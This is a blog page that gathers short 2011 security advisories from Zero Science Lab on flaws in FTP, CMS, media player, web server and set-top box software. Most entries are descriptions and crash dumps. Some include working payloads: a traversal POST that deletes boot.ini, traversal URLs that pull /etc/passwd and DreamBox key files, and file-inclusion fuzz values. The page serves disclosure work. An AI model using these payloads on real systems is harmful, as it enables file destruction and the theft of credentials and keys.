Posts Tagged ‘ предупредување

Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit

MiniFTPServer suffers from a denial of service vulnerability when passing large number of bytes after authentication, resulting in a crash. No need for a valid FTP command to exploit this issue.

dbg output:

(1540.918): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00e4f900 ebx=00000000 ecx=00000000 edx=00f163e8 esi=00e4f900 edi=055ef384
eip=031187d3 esp=055ef154 ebp=055ef394 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
031187d3 3909 cmp dword ptr [ecx],ecx ds:0023:00000000=????????
0:011> d edx
00f163e8 80 6a 9f 7a 28 f9 c5 00-00 00 00 00 64 f1 dc 00 .j.z(…….d…
00f163f8 54 72 f1 00 00 00 00 00-00 00 00 00 01 00 00 80 Tr…………..
00f16408 00 00 00 00 4c 64 f1 00-00 00 00 00 00 00 00 00 ….Ld……….
00f16418 18 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….
00f16428 b0 f1 dc 00 01 00 00 00-00 00 00 00 00 00 00 00 …………….
00f16438 00 00 00 00 00 00 00 00-f4 01 00 00 50 f9 e4 00 …………P…
00f16448 00 00 00 00 68 b4 b9 79-00 00 00 00 70 64 f1 00 ….h..y….pd..
00f16458 00 00 00 00 00 00 00 00-00 00 00 00 80 72 f1 00 ………….r..
0:011> d
00f16468 00 00 00 00 00 00 00 00-f0 b0 5c 7b 00 00 00 00 ……….\{….
00f16478 80 9f b9 00 84 64 f1 00-00 00 01 00 60 9e b9 79 …..d……`..y
00f16488 c4 1a a0 00 00 00 00 00-00 00 00 00 ac f9 b9 79 ……………y
00f16498 f4 01 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ….A.A.A.A.A.A.
00f164a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00f164b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00f164c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00f164d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.


Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5040.php

F-Secure BlackLight 2.2.1092 Local Privilege Escalation Vulnerability

Vendor: F-Secure Corporation
Product web page: http://www.f-secure.com

http://www.f-secure.com/en_EMEA-Labs/security-threats/tools/blacklight/

Affected version: 2.2.1092

Summary: F-Secure BlackLight is a tool that detects files, folders and
processes hidden from the user and other programs. BlackLight is also
able to remove hidden malware by renaming them.

Desc: The rootkit eliminator is vulnerable to an elevation of privileges
vulnerability which can be used by a simple user that can change the
executable file with a binary of choice. The vulnerability exist due to
the improper permissions, with the ‘C’ flag (change/write) for the ‘Everyone’
group, for the ‘fsbl.exe’ binary file.

Tested on: Microsoft Windows XP Professional SP3 (EN)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2011-5038
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5038.php

10.08.2011

C:\>cacls fsbl.exe
C:\fsbl.exe BUILTIN\Administrators:F
Everyone:C
LABPC\User4:F
NT AUTHORITY\SYSTEM:F

C:\>

 

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5038.php

PG eLMS Pro vDEC_2007_01 Multiple Remote Vulnerabilities (XSS/bSQLi)

XSS: Input passed via the ‘subject’, ‘name’, ‘email’ and ‘body’ parameters to ‘contact_us.php’ script is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

bSQLi: Input passed via the ‘lang_code’ GET parameter to index.php and login.php in ‘/www/core/language.class.php’, and ‘login’ POST parameter to login.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Advisory: ZSL-2011-5027, ZSL-2011-5028

TCExam Multiple Remote Vulnerabilities + Patch

TCExam bellow version 11.2.012 is vulnerable to multiple XSS and SQL Injection attack. Update to version 11.2.012!

TCExam version 11.02.009, 11.2.010 and 11.2.011 tested.

********** Cross-Site Scripting Reflected (script name / parameter(s) / http method) **********

1. /admin/code/tce_colorpicker.php (frm, fld, tag) – GET
2. /admin/code/tce_edit_backup.php (backup_file) – POST
3. /admin/code/tce_edit_group.php (group_name, group_id) – POST
4. /admin/code/tce_edit_module.php (module_id, module_user_id) – POST
5. /admin/code/tce_edit_rating.php (test_id) – POST
6. /admin/code/tce_edit_subject.php (subject_module_id, subject_id) – POST
7. /admin/code/tce_edit_test.php (test_id) – POST
8. /admin/code/tce_filemanager.php (file) – POST
9. /admin/code/tce_select_mediafile.php (frm, fld, file) – GET, GET, POST
10. /admin/code/tce_select_users.php (new_group_id) – POST
11. /admin/code/tce_show_all_questions.php (subject_module_id) – POST
12. /admin/code/tce_show_result_user.php (test_id) – POST
13. /public/code/tce_user_change_email.php (xl_user_email) – POST
14. /public/code/tce_user_change_password.php (xl_newpassword) – POST
15. /public/code/tce_user_registration.php (xl_user_email, xl_newpassword, xl_user_birthdate) – POST

********** Cross-Site Scripting URI Based (script name) **********

1. /admin/code/index.php
2. /admin/code/tce_csv_users.php
3. /admin/code/tce_edit_answer.php
4. /admin/code/tce_edit_backup.php
5. /admin/code/tce_edit_group.php
6. /admin/code/tce_edit_module.php
7. /admin/code/tce_edit_question.php
8. /admin/code/tce_edit_rating.php
9. /admin/code/tce_edit_subject.php
10. /admin/code/tce_edit_test.php
11. /admin/code/tce_edit_user.php
12. /admin/code/tce_filemanager.php
13. /admin/code/tce_import_omr_answers.php
14. /admin/code/tce_import_xml_questions.php
15. /admin/code/tce_import_xml_users.php
16. /admin/code/tce_menu_modules.php
17. /admin/code/tce_menu_tests.php
18. /admin/code/tce_menu_users.php
19. /admin/code/tce_page_info.php
20. /admin/code/tce_select_mediafile.php
21. /admin/code/tce_select_users.php
22. /admin/code/tce_show_all_questions.php
23. /admin/code/tce_show_allresults_users.php
24. /admin/code/tce_show_online_users.php
25. /admin/code/tce_show_result_allusers.php
26. /admin/code/tce_show_result_questions.php
27. /admin/code/tce_show_result_user.php
28. /admin/code/tce_xml_users.php
29. /public/code/index.php
30. /public/code/tce_page_user.php
31. /public/code/tce_user_change_email.php
32. /public/code/tce_user_change_password.php
33. /public/code/tce_user_registration.php

********** Cross-Site Scripting in path (script name) **********

1. /admin/code
2. /public/code

********** SQL Injection (script name / parameter(s) / http method) **********

1. /admin/code/tce_edit_group.php (group_id) – POST
2. /admin/code/tce_edit_module.php (module_id, module_user_id) – POST
3. /admin/code/tce_edit_rating.php (test_id) – POST
4. /admin/code/tce_edit_subject.php (subject_module_id) – POST
5. /admin/code/tce_edit_test.php (test_id) – POST
6. /admin/code/tce_select_users.php (new_group_id) – POST
7. /admin/code/tce_show_all_questions.php (subject_module_id) – POST
8. /admin/code/tce_show_result_questions.php (orderdir, order_field) – POST, GET
9. /admin/code/tce_show_result_user.php (test_id) – POST

********** Possible Cookie Manupulation (script name / parameter(s) / http method) **********

1. /admin/code/tce_edit_group.php (group_id) – POST
2. /public/code/tce_user_registration.php (xl_user_email, xl_newpassword, xl_user_birthdate) – POST

Advisory ZSL-2011-5025: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5025.php
Advisory: ZSL-2011-5026: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5026.php

Tugux CMS 1.2 (pid) Remote Arbitrary File Deletion Vulnerability

Input passed to the ‘pid’ parameter in administrator/delete_page_parse.php is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server via directory traversal sequences passed within the ‘pid’ parameter.

PoC:

——————————

POST /tugux/administrator/delete_page_parse.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 175
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=—-x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

——x
Content-Disposition: form-data; name=”pid”

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../boot.ini
——x–

——————————

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5024.php

ESTsoft ALPlayer 2.0 ASX Playlist File Handling Buffer Overflow Vulnerability

The vulnerability is caused due to a boundary error in the processing of a playlist file , which can be exploited to cause a stack-based buffer overflow when a user opens e.g. a specially crafted .asx file. Successful exploitation may allow execution of arbitrary code.

————————————————————————-

(188.820): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0095c8e0 ebx=0012e560 ecx=00004141 edx=00ce4fc0 esi=026d1902 edi=0012e5ac
eip=7855c776 esp=0012e458 ebp=0012e468 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
MSVCR90!_isspace_l+0x3b:
7855c776 0fb70448 movzx eax,word ptr [eax+ecx*2] ds:0023:00964b62=????

————————————————————————-

PoC: alplayer_bof.rar
Advisory ID: ZSL-2011-5023
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5023.php

NetServe Web Server v1.0.58 Multiple Remote Vulnerabilities

NetServe Web Server is vulnerable to multiple vulnerabilities including cross-site scripting, remote file inclusion, local file inclusion, script insertion, html injection, denial of service, etc. Given that the software is not maintained anymore and the last update was in 2006, there are still a few that uses it. All the parameters are susceptible to the above attacks. The list of the parameters used by the web application are(post/get):

– Action
– EnablePasswords
– _Checks
– _ValidationError
– ListIndex
– SiteList_0
– SSIErrorMessage
– SSIExtensions
– SSITimeFormat
– SSIabbrevSize
– EnableSSI
– LogCGIErrors
– LoggingInterval
– ExtendedLogging
– CGITimeOut

The tests were made using PowerFuzzer and OWASP ZAP. Attackers can exploit any of the issues using a web browser.

————snip—————
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=http%3A%2F%2Fwww.google.com%2F&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd%00&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd%00&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd%00&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd%00
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=c%3A%5C%5Cboot.ini&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=c%3A%5C%5Cboot.ini&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
————snip—————

Advisory ID: ZSL-2011-5021
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5021.php

Sitemagic CMS 2010.04.17 (SMExt) Remote XSS Vulnerability

Sitemagic CMS suffers from a XSS vulnerability when parsing user input to the ‘SMExt’ parameter via GET method in ‘index.php’. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Vendor Status
[10.06.2011] Initial contact with the vendor.
[10.06.2011] Vendor replies asking more details.
[10.06.2011] Sent vulnerability details to vendor.
[11.06.2011] Vendor replies.
[12.06.2011] Vendor confirms vulnerability.
[15.06.2011] Asked vendor for scheduled patch release date.
[17.06.2011] No reply from vendor.
[18.06.2011] Sent another e-mail to vendor asking for scheduled patch release date, pointing out the reasonable timeframe for fixing a XSS issue.
[18.06.2011] Vendor says that they will keep me posted when new release is available.
[20.06.2011] Informed the vendor that the advisory release will be on 21st of June.
[21.06.2011] Public security advisory released.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5020.php

Tugux CMS 1.2 Multiple Remote Vulnerabilities

The application suffers from multiple issues including: reflected and stored xss, sql Injection, local file inclusion, url redirection. Vulnerable parameters include: ‘name’, ‘comment’, ‘nid’, ‘submit1′, ‘email’, ‘topic_id’.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5014.php

DreamBox DM500(+) Arbitrary File Download Vulnerability

Dreambox suffers from a file download vulnerability thru directory traversal with appending the ‘/’ character in the HTTP GET method of the affected host address. The attacker can get to sensitive information like paid channel keys, usernames, passwords, config and plug-ins info, etc.

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5013.php